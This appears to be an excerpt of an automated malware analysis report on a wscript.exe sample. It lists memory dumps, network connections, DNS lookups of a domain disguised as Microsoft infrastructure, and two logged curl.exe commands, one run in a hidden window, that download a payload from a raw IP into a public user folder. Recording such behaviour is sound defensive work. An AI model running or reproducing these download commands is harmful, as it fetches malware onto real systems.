Technical Information
- %TEMP%\content\96-112-wscript.exe-19-50-26-162.dump
- %TEMP%\content\96-112-wscript.exe-19-50-26-229.dump
- %TEMP%\content\96-112-wscript.exe-19-50-42-651.dump
- 'co####erhope.com':443
- '16#.#52.172.185':80
- 'co####erhope.com':443
- DNS ASK co####erhope.com
- DNS ASK im##########-rt-microsoft-com.akamaized.net
- '<SYSTEM32>\curl.exe' -o c:\users\public\consults.tmp http://162.252.172.185/MA4g9/CF231' (with hidden window)
- '<SYSTEM32>\curl.exe' -o c:\users\public\consults.tmp http://162.252.172.185/MA4g9/CF231